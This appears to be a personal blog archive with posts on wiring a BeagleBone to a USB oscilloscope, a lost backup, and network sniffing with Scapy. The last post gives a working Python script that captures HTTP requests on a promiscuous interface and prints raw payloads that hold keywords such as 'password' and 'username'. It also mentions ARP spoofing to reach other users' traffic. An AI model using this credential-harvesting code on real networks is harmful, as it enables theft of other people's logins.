Month: September 2019

connecting BBB /w USB Oscilloscope

We used a quite fancy digital oscilloscope in reverse engineering laboratory. Outside lab, I should find better way to recover my poor learning skills. Honestly, I am not a hardware guy, thus there were always tons of trial errors whenever playing with Beagle Bone. Fortunately, now I found out how to connect USB to TTL serial cable and how to display frequency on the alternative oscilloscope.

Make stable connections with BBB

Fist thing first, we need to connect BBB to PC with regular USB cable.
There is a trick. When BBB is connected to PC, 4 blue LEDs will be blinking simultaneously. As soon as it stops blinking, make USB to TTL cable plugged into serial debug slot. First slot is GND, fourth is TX and firth is RX. Safe option is to push reset button in any unusual cases.

Base terminal application

I have been using the Screen for Raspberry Pi but Minicom is much better for BBB since it can modify some communication options like hardware flow control.

Just make same configuration on Minicom by using minicom -s option then save setup as dfl. Serial device location can be found inside dmesg.

PC based digital oscilloscope

Only thing that I needed to know it how to recap my hands-on exercises. There were bunch of USB digital oscilloscope, but I chose Hantek since it was most cost-effective product in market. If I have enough budget, I would buy the Analog Discovery 2 USB Oscilloscope. Alternatively, I believe Hantek PC Based USB Digital Storage Oscilloscope 6022BE seems to be enough for my purpose. This article was quite helpful: Top 7 PC-based USB oscilloscopes of 2017: for hobbyists, makers, and pros

snapshot

I should have followed the wise saying: “There are two types of people. Those who backup and those who have yet to lose everything to a system crash.”

I wrote some takeaways from current learning practices on this tidy little space. Website was running on VM ESXi for few months without issue; however, an error has occurred while migrating and installing the hypervisors. Thought I made full disk back up, but I did not notice that file contains some errors. So, now I am in the middle of recovering my previous records.

Anyways, it’s time to move one step further.

sniff network /w scapy

There are always chances to get someone else’s unencrypted traffic especially in local network. We might use ARP-spoof, poisoning, gateway attack whatever, but Scapy is the one of great toot to check network environment.

Pres-requisite

$sudo apt-get install python-scapy python-pip
$pip install scapy_http

Enable Promiscuous mode on network interface
$sudo ifconfig interface(eth0 whatever) promisc

It is always best to try it on bridged network. To avoid interference, testing on local host machine would be the best practice. 

import scapy.all as scapy
from scapy_http import http
import argparse
def get_arguments():
    parser = argparse.ArgumentParser()
    parser.add_argument("-i", "--interface", dest="interface",
                        help="Interface name")
    options = parser.parse_args()
    return options
def sniff_packet(interface):
    scapy.sniff(iface=interface, store=False, prn=process_packets)
def get_url(packet):
    return packet[http.HTTPRequest].Host + packet[http.HTTPRequest].Path
def get_credentials(packet):
    if packet.haslayer(scapy.Raw):
        load = packet[scapy.Raw].load
        keywords = ["login", "submission","challenge","password", "username", "user", "pass"]
        for keyword in keywords:
            if keyword in load:
                return load
def process_packets(packet):
    if packet.haslayer(http.HTTPRequest):
        url = get_url(packet)
        print("[+] Http Request >> " + url)
        credentials = get_credentials(packet)
        if credentials:
            print("[+] Someone has submitted flag, interested? " + credentials + "\n\n")
options = get_arguments()
sniff_packet(options.interface)